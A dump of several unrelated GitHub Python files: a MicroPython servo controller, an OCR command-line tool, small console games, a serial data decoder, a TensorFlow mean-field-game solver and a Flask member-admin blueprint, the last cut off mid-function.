+{"seq_id":"2512647552","text":"class ServoSweep:\n \"\"\"A sample target class that gets invoked as a timer callback\"\"\"\n\n def __init__(\n self, pin, pin_adc=None, schedule=None, start_angle=0, step_degrees=30\n ):\n \"\"\"\n ;param pin : i/O pin\n ;param pin_adc: adc pin to log values - really should be a function or remoted\n ;param schedule : if running in IRQ should be micropython.schedule for safe irq handling\n ;param start_angle: servo should be initialized to some angle\n ;param step_degrees: size of each step\n \"\"\"\n self.target = pin\n self.pin_adc = pin_adc\n # need to allocate the reference prior to using it in a callback\n self.sweep_ref = self.sweep\n self.schedule = schedule\n # This will be wrong if not passed in\n self.target_angle = start_angle\n self.step_degrees = step_degrees\n self.debug_enabled = True\n\n def sweep(self, _):\n \"\"\"Actual callback target run via schedule(). Can be used directly if no allocations. We don't use the timer anyway\"\"\"\n if self.pin_adc:\n self.log_pin_adc(self.pin_adc)\n\n new_target = self.target_angle\n if self.target_angle < 180 and self.target_angle + self.step_degrees <= 180:\n new_target = self.target_angle + self.step_degrees\n else:\n new_target = 0\n # Does this allocate memory? 
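`data_extractor` above dispatches on the expression prefix: `$` goes to the JSONPath helper, while `/` or `.` goes to the XPath helper over the parsed HTML. A usage sketch, assuming the module's `data_extractor` is in scope; the sample inputs are made up and the commented results are indicative only, since they depend on the underlying `easy_spider_tool` helpers:

```python
# Usage sketch for data_extractor; sample inputs are made up for illustration.
json_src = '{"items": [{"name": "a"}, {"name": "b"}]}'
html_src = "<ul><li>a</li><li>b</li></ul>"

# '$' prefix -> routed to the JSONPath helper
names = data_extractor(json_src, "$.items[*].name")        # e.g. ['a', 'b']

# '/' or '.' prefix -> routed to the XPath helper over the parsed HTML
items = data_extractor(html_src, "//li/text()")            # e.g. ['a', 'b']

# first=True asks for only the first match; `default` is returned when nothing matches
first_name = data_extractor(json_src, "$.items[0].name", first=True)
```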
Does this require schedule()?\n if self.debug_enabled:\n print(\"Sweeping to %s\" % (str(new_target)))\n self.target.write_angle(new_target)\n self.target_angle = new_target\n\n def irq_callback(self, t):\n \"\"\"Callback will schedule() an allocated sweep() if schedule() provided at init\"\"\"\n if self.schedule:\n self.schedule(self.sweep_ref, 0)\n else:\n self.sweep_ref(0)\n\n def log_pin_adc(self, pin_adc):\n # try highest resolution first\n try:\n if self.debug_enabled:\n print(\"Analog: prev position raw u16: \" + str(pin_adc.read_u16()))\n except AttributeError:\n if self.debug_enabled:\n print(\"Analog prev position raw : \" + str(pin_adc.read()))\n","repo_name":"freemansoft/ESP8266-MicroPython","sub_path":"servosweep.py","file_name":"servosweep.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"20796017963","text":"import argparse\nimport keras_ocr\nimport json\nfrom conformity.Conformity import Conformity\npipeline = pipeline = keras_ocr.pipeline.Pipeline()\n\nmy_parser = argparse.ArgumentParser(description=\"Json giving information about a conformity file.\")\nmy_parser.add_argument('--save', help=\"save the printed result into a json file\", action=\"store_true\")\nmy_parser.add_argument('image_path', type= str, help=\"Path of image to check conformity for.\")\n\nargs = my_parser.parse_args()\n\nimage_path = args.image_path\n\nmy_conformity = Conformity(pipeline, image_path)\n\nresult = my_conformity.get_conformity()\nprint(result)\n\nif args.save:\n json_file_name = image_path.replace('.','_')\n json_file_name = json_file_name+'.json'\n with open(json_file_name, 'w') as json_file:\n json.dump(result, json_file)","repo_name":"fredericsonergia/confomity-presence","sub_path":"src/CLI_conformity.py","file_name":"CLI_conformity.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41818690914","text":"import time\nimport random\n\nluke = {'name': \"Luke Skywalker\", 'power': 100, 'health': 300}\nobiwan = {'name': \"Obiwan Kenobi\", 'power': 150, 'health': 325}\nmonster = {'power': 75, 'health': 450}\n\nplayer = luke\n\nfinish = False\n\n\nprint(\"A battle begins! 
\"+player['name']+\" against Monster\")\n\nwhile finish == False:\n\n time.sleep(3)\n \n shield = 0\n print(\"\\n(1) Attack\")\n print(\"(2) Defense\")\n playermove = input(\"Choose one number for movement (1 or 2): \")\n\n if (playermove == \"1\"):\n\n print(player['name'] + \" will attack Monster\")\n \n dmg2monster = random.uniform(0.5*player['power'], player['power'])\n\n ##Create bonus damage by calculating weak point:\n num1 = random.randint(1, 100)\n num2 = random.randint(1, 100)\n print(\"\\nCalculate weak point for bonus damage:\")\n\n time1 = time.time()\n answer = input(str(num1) + \" + \" + str(num2) + \"= \")\n waittime = time.time() - time1\n\n if (waittime < 3) and (num1 + num2 == int(answer)):\n dmg2monster = 1.5*dmg2monster\n print(\"Monster will get bonus damage!\")\n else:\n print(\"Monster will get normal damage..\")\n\n else:\n\n print(player['name'] + \" will be defensive\")\n shield = 1\n\n time.sleep(2)\n \n monstershield = 0\n monstermove = random.randint(1, 2)\n if monstermove == 1:\n print(\"\\nMonster will attack \" + player['name'])\n dmg2player = random.uniform(0.5*monster['power'], monster['power'])\n else:\n print(\"\\nMonster will be defensive\")\n monstershield = 1\n\n time.sleep(2)\n\n #RESULT:\n if (playermove == \"1\"):\n monster['health'] = monster['health'] - dmg2monster*(1-0.5*monstershield)\n print(\"Monster is damaged by \" + str(dmg2monster*(1-0.5*monstershield)))\n\n time.sleep(2)\n \n if monster['health'] < 0:\n print(\"Player Wins\")\n finish = True\n break\n \n if (monstermove == 1):\n player['health'] = player['health'] - dmg2player*(1-0.5*shield)\n print(\"Player is damaged by \" + str(dmg2player*(1-0.5*shield)))\n\n time.sleep(2)\n\n if player['health'] < 0:\n print(\"Player Defeated\")\n finish = True\n break\n \n print(\"\\nResult: \")\n \n print(player['name'])\n print(\"Health Point: \" + str(player['health']))\n print(\"\\nMonster\")\n print(\"Health Point: \" + str(monster['health']))\n\n time.sleep(2)\n","repo_name":"anbarief/Blog","sub_path":"Tutorial/jedi_vs_monster.py","file_name":"jedi_vs_monster.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"31180714537","text":"from random import randint\nimport os\n\nboard = []\nplayer = \"Choice\"\nplay = \"y\"\n\nwhile play == \"y\":\n\n #player = input(\"Do you want to play Single Mode or Dual Mode (S/D): \")\n\n i = 2;\n while (i < 3 or i > 9) :\n i = int(input(\"Choose your board size: \"))\n if i < 3:\n print(\"Choose a size larger than 2\")\n elif i > 9:\n print(\"Choose a size smaller than 10\")\n\n for x in range(i):\n board.append([\"O\"] * i)\n\n\n def print_board(board):\n for row in board:\n print((\" \").join(row))\n\n\n def random_row(board):\n return randint(0, len(board) - 1)\n\n\n def random_col(board):\n return randint(0, len(board[0]) - 1)\n\n #if(player is \"S\"):\n #Aurielle & Luna's Code\n def get_username():\n username_file = \"username.txt\"\n if not os.path.isfile(username_file):\n fo = open(username_file, \"a\")\n fo.close()\n\n if os.stat(username_file).st_size == 0:\n fo = open(username_file, \"a+\")\n print(\"No saved username.\")\n username = input(\"Enter username:\")\n choice = input(\"Enter 1 to save username or enter any key to continue : \")\n if choice == \"1\":\n fo.write(username + \"\\n\")\n fo.close()\n\n else:\n fo = open(username_file, \"r\")\n lines = fo.readlines()\n num = 1\n for line in lines:\n print(num, line.strip())\n num += 1\n 
username_num = int(input(\"Enter the number of your username or enter 0 to add new username:\"))\n if username_num == 0:\n username = input(\"Enter username:\")\n choice = input(\"Enter 1 to save username or enter any key to continue\")\n if choice == \"1\":\n fo = open(username_file, \"a+\")\n fo.write(username + \"\\n\")\n fo.close()\n else:\n while username_num > num:\n print(\"Invalid input!\")\n username_num = int(input(\"Enter the number of your username:\"))\n fo = open(username_file, \"r\")\n username = \"\"\n for count in range(username_num):\n username = fo.readline()\n fo.close()\n username = username.strip()\n print(\"Welcome \" + username + \"!\")\n print(\"Let's play Battleship!\")\n #File handling ---- done\n\n def ask_guess():\n guess_num = int(input(\"Enter the number of turns you need (from 1-20): \"))\n while guess_num < 1 or guess_num > 20:\n print(\"Invalid input!\")\n guess_num = int(input(\"Enter the number of turns you need (from 1-20): \"))\n return guess_num\n\n #if(player is \"S\"):\n get_username()\n\n guess_num = ask_guess()\n print_board(board)\n ship_row = random_row(board)\n ship_col = random_col(board)\n\n turn_left = guess_num - 1;\n\n #Random position\n def random_pos(board):\n return randint(0, len(board) - 1)\n\n ship_row = []\n ship_col = []\n\n # number of ships = row size - 1\n for ships in range(i - 2):\n ship_row.append(random_pos(board))\n ship_col.append(random_pos(board))\n print(\"There is a ship at row\", ship_row[ships] + 1, \"column\", ship_col[ships] + 1)\n\n ships = i - 2\n\n #Playing the Game\n for turn in range(guess_num):\n print(guess_num - turn, \"turns left\")\n guess_row = (int(input(\"Guess Row: \")) - 1)\n guess_col = (int(input(\"Guess Col: \")) - 1)\n\n if guess_row in ship_row and guess_col in ship_col:\n board[guess_row][guess_col] = \"@\"\n ships -= 1\n if ships == 0:\n print(\"Congratulations! 
You sunk all my battleship!\")\n break\n else:\n print(\"You sunk my battleship!\", ships, \"more remaining\")\n elif (guess_row < 0 or guess_row > i - 1) or (guess_col < 0 or guess_col > i - 1):\n print(\"Oops, that's not even in the ocean.\")\n turn -= 1\n elif board[guess_row][guess_col] == \"X\":\n print(\"You guessed that one already.\")\n turn -= 1\n else:\n print(\"You missed my battleship!\")\n board[guess_row][guess_col] = \"X\"\n\n if turn + 1 == guess_num:\n print(\"Game Over\")\n for x in range(i - 2):\n board[int(ship_row[x])][int(ship_col[x])] = \"@\"\n print_board(board)\n\n play = input(\"Try again?(y/n) : \")\n print(\" \")\n","repo_name":"lunamk24/Battleship_Game_Project","sub_path":"Battleship.py","file_name":"Battleship.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"6443668292","text":"import sys\nimport numpy as np\nimport struct\nimport serial\n\nif len(sys.argv) != 3:\n print(\"Usage: {} \".format(sys.argv[0]))\n sys.exit()\n\nser = serial.Serial(sys.argv[1], sys.argv[2])\ndat = ser.read(8192*2)\ndat = np.array(struct.unpack(\"<{}h\".format(8192), dat)).astype(np.float)\nt = np.linspace(0, 18/100e6, 18)\n\ndat = (dat > 0).astype(np.uint8)\ndat = dat[::4]\n\nprint(''.join(str(x) for x in dat))\n","repo_name":"adamgreig/basebandboard","sub_path":"software/memdump/decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26899883514","text":"# authors: Sara Bicego, Matteo Butano\n# emails: s.bicego21@imperial.ac.uk, matteo.butano@universite-paris-saclay.fr\n\nfrom DGM import DGMNet\nimport pandas as pd\nimport tensorflow as tf\nfrom keras import backend as K\nimport numpy as np\nimport random\nimport os\nimport json\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport datetime\n\n\nclass dgm_net:\n \n def __init__(self):\n '''\n Initialise the two NNs for Phi and Theta, creates points.\n\n Returns\n -------\n None.\n\n '''\n \n with open('config.json') as f:\n var = json.loads(f.read())\n \n self.DTYPE = 'float32'\n self.var = var\n \n # MFG parameters \n self.xi = var['mfg_params']['xi']\n self.c_s = var['mfg_params']['c_s']\n self.mu = var['mfg_params']['mu']\n self.m_0 = var['room']['m_0']\n self.g = -(2*self.xi**2)/self.m_0\n self.sigma = np.sqrt(2*self.xi*self.c_s)\n self.l = -self.g*self.m_0\n self.R = 0.37\n self.s = tf.constant([0, -var['room']['s']], dtype=self.DTYPE, shape=(1, 2))\n self.pot = var['mfg_params']['V']\n \n # NN parameters\n self.training_steps = var['dgm_params']['training_steps']\n self.learning_rate = var['dgm_params']['learning_rate']\n \n # Room definition \n self.lx = var['room']['lx']\n self.ly = var['room']['ly']\n self.N_b = int(var['room']['N_b'])\n self.N_in = int(var['room']['N_in'])\n \n # Initial total mass\n self.total_mass = tf.constant(self.m_0*(2*self.lx)*(2*self.ly),dtype=self.DTYPE)\n \n # Seed value\n self.seed_value = 0\n os.environ['PYTHONHASHSEED'] = str(self.seed_value)\n \n # Initialize random variables for repoducibility\n random.seed(self.seed_value)\n np.random.seed(self.seed_value)\n tf.random.set_seed(self.seed_value)\n session_conf = tf.compat.v1.ConfigProto(intra_op_parallelism_threads=0,\n inter_op_parallelism_threads=0)\n \n sess = tf.compat.v1.Session(graph=tf.compat.v1.get_default_graph(), config=session_conf)\n K.set_session(sess)\n \n # Set data 
type\n tf.keras.backend.set_floatx(self.DTYPE)\n \n self.phi_theta = DGMNet(var['dgm_params']['nodes_per_layer'],\n var['dgm_params']['RNN_layers'],\n var['dgm_params']['FNN_layers'], 2,\n var['dgm_params']['activation'])\n \n self.gamma_theta = DGMNet(var['dgm_params']['nodes_per_layer'],\n var['dgm_params']['RNN_layers'],\n var['dgm_params']['FNN_layers'], 2,\n var['dgm_params']['activation'])\n \n self.X_b, self.X_in, self.X_out = self.sample_room()\n \n self.all_pts = tf.constant(tf.concat([self.X_out,self.X_in,self.X_b],axis = 0))\n \n self.history = []\n \n return\n \n def V(self,phi,gamma):\n '''\n Describes the potential of the cost-functional\n\n Parameters\n ----------\n phi : tensorflow.tensor\n Values of phi_theta over training points.\n gamma : tensorflow.tensor\n Values of gamma_theta over training points.\n\n Returns\n -------\n tensorflow.tensor\n Values of the potential over the training points.\n\n '''\n \n all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n U0 = np.zeros(shape = (self.N_b + self.N_in,1))\n \n U0[np.sqrt(all_pts[:,0]**2 + all_pts[:,1]**2) < self.R] = self.pot\n \n U0 = tf.constant(U0, dtype=self.DTYPE)\n \n mean_field = tf.math.scalar_mul(self.g,tf.multiply(phi,gamma))\n \n return mean_field + U0 # formula for the potential from reference \n \n def sample_room(self):\n '''\n Samples the training points, randomly over simulation area.\n\n Returns\n -------\n pandas.DataFrame, pandas.DataFrame, pandas.DataFrame\n Three dataframes containing boundary points, points inside and outside the cylinder.\n\n '''\n \n # Lower bounds\n lb = tf.constant([-self.lx, -self.ly], dtype=self.DTYPE)\n # Upper bounds\n ub = tf.constant([self.lx, self.ly], dtype=self.DTYPE)\n \n # Draw uniform sample points for data in the domain\n x_room = tf.random.uniform((self.N_in, 1), lb[0], ub[0], dtype=self.DTYPE)\n y_room = tf.random.uniform((self.N_in, 1), lb[1], ub[1], dtype=self.DTYPE)\n X_room = tf.concat([x_room, y_room], axis=1)\n \n # Divide between points inside and outside the cylinder\n points_in = tf.where(tf.norm(X_room, axis=1) <= self.R)\n points_out = tf.where(tf.norm(X_room, axis=1) > self.R)\n X_in = tf.gather(X_room, points_in)\n X_out = tf.gather(X_room, points_out)\n X_in = tf.squeeze(X_in)\n X_out = tf.squeeze(X_out)\n \n # Boundary data (square - outside walls)\n x_b1 = lb[0] + (ub[0] - lb[0]) * tf.keras.backend.random_bernoulli((int(self.N_b/2), 1), 0.5, dtype=self.DTYPE)\n y_b1 = tf.random.uniform((int(self.N_b/2), 1), lb[1], ub[1], dtype=self.DTYPE)\n y_b2 = lb[1] + (ub[1] - lb[1]) * tf.keras.backend.random_bernoulli((int(self.N_b/2), 1), 0.5, dtype=self.DTYPE)\n x_b2 = tf.random.uniform((int(self.N_b/2), 1), lb[0], ub[0], dtype=self.DTYPE)\n x_b = tf.concat([x_b1, x_b2], axis=0)\n y_b = tf.concat([y_b1, y_b2], axis=0)\n X_b = tf.concat([x_b, y_b], axis=1)\n\n return pd.DataFrame(X_b.numpy()), pd.DataFrame(X_in.numpy()), pd.DataFrame(X_out.numpy())\n \n def get_loss(self,verbose):\n '''\n Computes loss function by calculating the residuals.\n\n Returns\n -------\n tensorflow.tensor\n Loss function sum of the different residuals. 
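`sample_room` above draws uniform points over the rectangular room and then separates those inside the cylindrical obstacle (radius `R`) from those outside. The same split expressed in plain NumPy, with illustrative values for the room half-widths and radius that the class normally reads from `config.json`:

```python
import numpy as np

# Illustrative values; the class reads lx, ly and R from config.json.
lx, ly, R, n_points = 5.0, 5.0, 0.37, 1000

rng = np.random.default_rng(0)
pts = np.column_stack([rng.uniform(-lx, lx, n_points),
                       rng.uniform(-ly, ly, n_points)])

dist = np.linalg.norm(pts, axis=1)
X_in = pts[dist <= R]    # points inside the cylindrical obstacle
X_out = pts[dist > R]    # points in the free part of the room
print(X_in.shape, X_out.shape)
```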
The default is True.\n\n '''\n \n all_pts = tf.Variable(tf.concat([self.X_out,self.X_in,self.X_b],axis = 0))\n \n # Compute gradient and laplacian for Phi\n \n with tf.GradientTape() as phi_tape_1:\n with tf.GradientTape() as phi_tape_2:\n \n phi = self.phi_theta(all_pts)\n \n grad_phi = phi_tape_2.gradient(phi,all_pts)\n \n jac_phi = phi_tape_1.gradient(grad_phi,all_pts)\n lap_phi = tf.math.reduce_sum(jac_phi,axis = 1)\n \n # Compute gradient and laplacian for Gamma\n \n with tf.GradientTape() as gamma_tape_1:\n with tf.GradientTape() as gamma_tape_2:\n \n gamma = self.gamma_theta(all_pts)\n \n grad_gamma = gamma_tape_2.gradient(gamma,all_pts)\n \n jac_gamma = gamma_tape_1.gradient(grad_gamma,all_pts)\n lap_gamma = tf.math.reduce_sum(jac_gamma,axis = 1)\n \n res_HJB = tf.reduce_mean(self.l*phi +self.V(phi,gamma)*phi + 0.5*self.mu*self.sigma**4*lap_phi - self.mu*self.sigma**2*tf.reduce_sum(self.s*grad_phi,axis = 1))**2\n \n res_KFP = tf.reduce_mean(self.l*gamma +self.V(phi,gamma)*gamma + 0.5*self.mu*self.sigma**4*lap_gamma + self.mu*self.sigma**2*tf.reduce_sum(self.s*grad_gamma,axis = 1))**2\n \n res_b_phi = tf.reduce_mean((tf.sqrt(self.m_0) - self.phi_theta(self.X_b))**2)\n res_b_gamma = tf.reduce_mean((tf.sqrt(self.m_0) - self.gamma_theta(self.X_b))**2)\n \n res_obstacle = tf.reduce_mean(self.phi_theta(self.X_in)**2) + tf.reduce_mean(self.gamma_theta(self.X_in)**2)\n \n res_total_mass = (tf.reduce_mean(phi*gamma)*(2*self.lx)*(2*self.ly)-self.total_mass)**2\n \n if verbose: \n print(' {:10.3e} {:10.3e} {:10.3e} {:10.3e} {:10.3e} {:10.3e}'.format(res_HJB,res_KFP,res_b_phi,res_b_gamma,res_obstacle,res_total_mass))\n \n self.history.append([res_HJB.numpy(),res_KFP.numpy(),res_b_phi.numpy(),res_b_gamma.numpy(),res_obstacle.numpy(),res_total_mass.numpy()])\n \n return res_HJB + res_KFP + res_b_gamma + res_b_phi + res_obstacle + res_total_mass\n \n def train_step(self,f_theta,verbose):\n '''\n Applies one training to the NN in input\n\n Parameters\n ----------\n f_theta : DGMNet\n Neural network created using the DGM package.\n\n Returns\n -------\n f_loss : tensorflow.tensor\n Value of the loss function.\n\n '''\n \n optimizer = tf.optimizers.Adam(learning_rate = self.learning_rate)\n \n with tf.GradientTape() as f_tape:\n \n f_vars = f_theta.trainable_weights\n f_tape.watch(f_vars)\n f_loss = self.get_loss(verbose)\n f_grad = f_tape.gradient(f_loss,f_vars)\n \n optimizer.apply_gradients(zip(f_grad, f_vars))\n \n return f_loss\n \n def train(self,verbose = True):\n '''\n Applies self.training_steps. \n \n Parameters\n ----------\n verbose : Bool\n When true prints the value of each residual at each iteration.\n\n Returns\n -------\n None.\n\n '''\n \n if verbose:\n print(' #iter res_HJB res_KFP res_b_phi res_b_gamma res_obstacle res_total_mass')\n print('-----------------------------------------------------------------------------------------------------------------')\n \n for step in range(1,self.training_steps + 1):\n \n if verbose:\n print('{:6d}'.format(step),end=\"\")\n \n # Train phi \n self.train_step(self.phi_theta,verbose)\n \n if verbose:\n print(' ',end=\"\")\n \n # Compute loss for phi and gamma\n \n self.train_step(self.gamma_theta,verbose)\n \n def warmstart_step(self,f_theta,f_IC,points_IC):\n '''\n Applies one step of warmstart. 
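`train_step` above follows the usual TensorFlow 2 pattern: watch the trainable weights with `tf.GradientTape`, evaluate the loss, and let Adam apply the gradients. In isolation, with a placeholder model and data standing in for the DGM networks and their residual loss, the pattern is:

```python
import tensorflow as tf

# Placeholder model and data, purely to show the GradientTape pattern used above.
model = tf.keras.Sequential([tf.keras.layers.Dense(1)])
optimizer = tf.optimizers.Adam(learning_rate=1e-3)
x = tf.random.uniform((32, 2))
y = tf.zeros((32, 1))

with tf.GradientTape() as tape:
    pred = model(x)
    loss = tf.reduce_mean((pred - y) ** 2)

grads = tape.gradient(loss, model.trainable_weights)
optimizer.apply_gradients(zip(grads, model.trainable_weights))
```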
\n\n Parameters\n ----------\n f_theta : DGMNet\n Either Phi_theta or Gamma_theta.\n f_IC : numpy.array\n Values of the exact solution for Phi or Gamma reshaped as (nx*ny,1).\n points_IC : numpy.array\n Coordinates of the exact solution's grid reshaped as (nx*ny,1).\n\n Returns\n -------\n f_loss : tensorflow.tensor\n MSE of the difference between NNs and the exact solution.\n\n '''\n \n #all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n optimizer = tf.optimizers.Adam(learning_rate = self.learning_rate)\n \n f_IC = pd.DataFrame(f_IC).astype(dtype = self.DTYPE)\n points_IC = pd.DataFrame(points_IC).astype(dtype = self.DTYPE)\n \n # Compute gradient wrt variables for phi and gamma\n \n with tf.GradientTape() as f_tape:\n \n f_vars = f_theta.trainable_weights\n f_tape.watch(f_vars)\n f_prediction = f_theta(points_IC)\n f_loss = tf.reduce_mean((f_prediction - f_IC)**2)\n f_grad = f_tape.gradient(f_loss,f_vars)\n \n optimizer.apply_gradients(zip(f_grad, f_vars))\n \n return f_loss\n \n def warmstart_step_simple(self,f_theta):\n '''\n One step of warmstart with simple IC\n\n Parameters\n ----------\n f_theta : dgmnet\n The net to which apply one step of warmstart.\n\n Returns\n -------\n f_loss : tf.tensor\n The value of the loss after one step of ws.\n\n '''\n \n all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n optimizer = tf.optimizers.Adam(learning_rate = self.learning_rate)\n \n # Compute gradient wrt variables for phi and gamma\n \n with tf.GradientTape() as f_tape:\n \n f_vars = f_theta.trainable_weights\n f_tape.watch(f_vars)\n f_prediction = f_theta(all_pts)\n f_loss = tf.reduce_mean((f_prediction - tf.sqrt(self.m_0))**2)\n f_grad = f_tape.gradient(f_loss,f_vars)\n \n optimizer.apply_gradients(zip(f_grad, f_vars))\n \n return f_loss\n \n def warmstart(self,phi_IC,gamma_IC,points_IC):\n '''\n Applies self.training_steps of warmstart\n\n Parameters\n ----------\n phi_IC : numpy.array\n Values of the exact solution for Phi reshaped as (nx*ny,1).\n gamma_IC : numpy.array\n Values of the exact solution for Gamma reshaped as (nx*ny,1)..\n points_IC : numpy.array\n Coordinates of the exact solution's grid reshaped as (nx*ny,1).\n\n Returns\n -------\n None.\n\n '''\n phi_loss = 1\n gamma_loss = 1\n step = 0\n \n while np.maximum(phi_loss,gamma_loss) > 10e-3:\n \n # Compute loss for phi and gamma\n \n phi_loss = self.warmstart_step(self.phi_theta,phi_IC,points_IC)\n gamma_loss = self.warmstart_step(self.gamma_theta,gamma_IC,points_IC)\n \n if step % 100 == 0:\n print('WS step {:5d}, loss phi={:10.3e}, loss gamma={:10.3e}'.format(step, phi_loss,gamma_loss))\n \n step +=1\n \n def warmstart_simple(self,verbose=True):\n '''\n Simple warmstart towards sqrt(m_0) condition. \n\n Parameters\n ----------\n verbose : Bool, optional\n Shows info bout the simple warmstart. 
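The warm-start routines keep applying the same MSE step until both networks are within tolerance of the target (the written threshold `10e-3` equals 0.01). Stripped of the class machinery, the control flow is roughly the following, where the two callables stand in for `warmstart_step_simple` on each network and are assumed to return the current loss as a float:

```python
# Sketch of the warm-start control flow; train_phi_once / train_gamma_once stand in
# for warmstart_step_simple on each network and are assumed to return a float loss.
def warmstart(train_phi_once, train_gamma_once, tol=1e-2, log_every=100):
    phi_loss = gamma_loss = float("inf")
    step = 0
    while max(phi_loss, gamma_loss) > tol:
        phi_loss = train_phi_once()
        gamma_loss = train_gamma_once()
        if step % log_every == 0:
            print("WS step {:5d}, loss phi={:10.3e}, loss gamma={:10.3e}".format(
                step, phi_loss, gamma_loss))
        step += 1
```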
The default is True.\n\n Returns\n -------\n None.\n\n '''\n \n phi_loss = 1\n gamma_loss = 1\n step = 0\n \n while np.maximum(phi_loss,gamma_loss) > 10e-3:\n \n # Compute loss for phi and gamma\n \n phi_loss = self.warmstart_step_simple(self.phi_theta)\n gamma_loss = self.warmstart_step_simple(self.gamma_theta)\n \n if verbose:\n print('WS step {:5d}, loss phi={:10.3e}, loss gamma={:10.3e}'.format(step, phi_loss,gamma_loss))\n \n step +=1\n \n \n def draw(self):\n '''\n Draw the scatter plot of the density of pedestrians.\n\n Returns\n -------\n None.\n\n '''\n all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n m = self.gamma_theta(all_pts)*self.phi_theta(all_pts)\n \n plt.figure(figsize=(8,8))\n plt.scatter(all_pts.numpy()[:,0], all_pts.numpy()[:,1], c=m, cmap='hot_r')\n plt.xlabel('$x$')\n plt.ylabel('$y$')\n plt.colorbar()\n plt.clim(vmin = 0)\n plt.show() \n \n def save(self):\n '''\n Save into 'trainings' directory some info about the training. \n\n Returns\n -------\n None.\n\n '''\n \n if not os.path.exists('./trainings'):\n os.mkdir('./trainings')\n \n current_time = datetime.datetime.now()\n dirname = current_time.strftime(\"%B %d, %Y %H-%M-%S\")\n \n if not os.path.exists('./trainings/' + dirname):\n os.mkdir('./trainings/' + dirname)\n \n labels = ['res_HJB', 'res_KFP', 'res_b_phi', 'res_b_gamma', 'res_obstacle', 'res_total_mass']\n history = np.array(self.history)\n fig, ax = plt.subplots(nrows = 2,ncols=3,figsize = (15,10))\n\n for col in range(history.shape[1]):\n \n ax[col//3,col%3].plot(history[:,col])\n ax[col//3,col%3].set_title(labels[col])\n \n plt.savefig('./trainings/' + dirname + '/residuals')\n \n training = {}\n\n training['config'] = self.var\n training['phi_theta'] = self.phi_theta(self.all_pts).numpy().tolist()\n training['gamma_theta'] = self.gamma_theta(self.all_pts).numpy().tolist()\n training['points'] = self.all_pts.numpy().tolist()\n \n # Serializing json\n json_object = json.dumps(training, indent=4)\n \n # Writing to sample.json\n with open(\"./trainings/\" + dirname + \"/net.json\", \"w\") as outfile:\n outfile.write(json_object)\n \n all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n m = self.gamma_theta(all_pts)*self.phi_theta(all_pts)\n \n plt.figure(figsize=(8,8))\n plt.scatter(all_pts.numpy()[:,0], all_pts.numpy()[:,1], c=m, cmap='hot_r')\n plt.xlabel('$x$')\n plt.ylabel('$y$')\n plt.colorbar()\n plt.clim(vmin = 0)\n \n plt.savefig('./trainings/' + dirname + '/density')\n \n","repo_name":"binchengecon/InequalityEcon_Shrink","sub_path":"MFG/neural_mfg.py","file_name":"neural_mfg.py","file_ext":"py","file_size_in_byte":16913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34512685802","text":"# -*- coding: utf-8 -*-\nfrom flask import Blueprint,request,redirect,jsonify\nfrom common.libs.Helper import ops_render,iPagination,getCurrentDate\nfrom common.libs.UrlManager import UrlManager\nfrom common.libs.user.UserService import UserService\nfrom common.models.log.AppAccessLog import AppAccessLog\nfrom common.models.User import User\nfrom sqlalchemy import or_\nfrom application import app, db\nfrom common.models.member.Member import Member\n\nroute_member = Blueprint('member_page', __name__)\n\n\n@route_member.route(\"/index\")\ndef index():\n resp_data = {}\n req = request.values\n page = int(req['p']) if ('p' in req and req['p']) else 1\n query = Member.query\n\n if 'mix_kw' in req:\n rule = or_(Member.nickname.ilike(\"%{0}%\".format(req['mix_kw'])), 
Member.mobile.ilike(\"%{0}%\".format(req['mix_kw'])))\n query = query.filter(rule)\n\n if 'status' in req and int(req['status']) > -1:\n query = query.filter(Member.status == int(req['status']))\n\n page_params = {\n 'total': query.count(),\n 'page_size': app.config['PAGE_SIZE'],\n 'page': page,\n 'display': app.config['PAGE_DISPLAY'],\n 'url': request.full_path.replace(\"&p={}\".format(page), \"\")\n }\n\n pages = iPagination(page_params)\n offset = (page - 1) * app.config['PAGE_SIZE']\n limit = app.config['PAGE_SIZE'] * page\n\n list = query.order_by(Member.id.desc()).all()[offset:limit]\n\n resp_data['list'] = list\n resp_data['pages'] = pages\n resp_data['search_con'] = req\n resp_data['status_mapping'] = app.config['STATUS_MAPPING']\n print(resp_data, '**********')\n return ops_render( \"member/index.html\",resp_data )\n\n\n@route_member.route(\"/set\", methods=[\"GET\", \"POST\"])\ndef set():\n default_pwd = \"******\"\n if request.method == \"GET\":\n resp_data = {}\n req = request.args\n id = int(req.get(\"id\", 0))\n info = None\n if id:\n info = Member.query.filter_by(id=id).first()\n resp_data['info'] = info\n return ops_render(\"member/set.html\", resp_data)\n\n resp = {'code': 200, 'msg': '操作成功~~', 'data': {}}\n req = request.values\n\n id = req['id'] if 'id' in req else 0\n nickname = req['nickname'] if 'nickname' in req else ''\n group_name = req['group_name'] if 'group_name' in req else ''\n\n if group_name is None or len(group_name) < 1:\n resp['code'] = -1\n resp['msg'] = \"请输入符合规范的组名~~\"\n return jsonify(resp)\n\n\n # has_in = Member.query.filter(Member.group_name == login_name, User.uid != id).first()\n # if has_in:\n # resp['code'] = -1\n # resp['msg'] = \"该登录名已存在,请换一个试试~~\"\n # return jsonify(resp)\n\n member_info = Member.query.filter_by(id=id).first()\n if member_info:\n model_member = member_info;\n else:\n resp['code'] = -1\n resp['msg'] = \"当前账号信息不存在,请确认后修改~~\"\n return jsonify(resp)\n model_member.group_name = group_name;\n model_member.nickname = nickname;\n model_member.updated_time = getCurrentDate()\n db.session.add(model_member)\n ret = db.session.commit()\n return 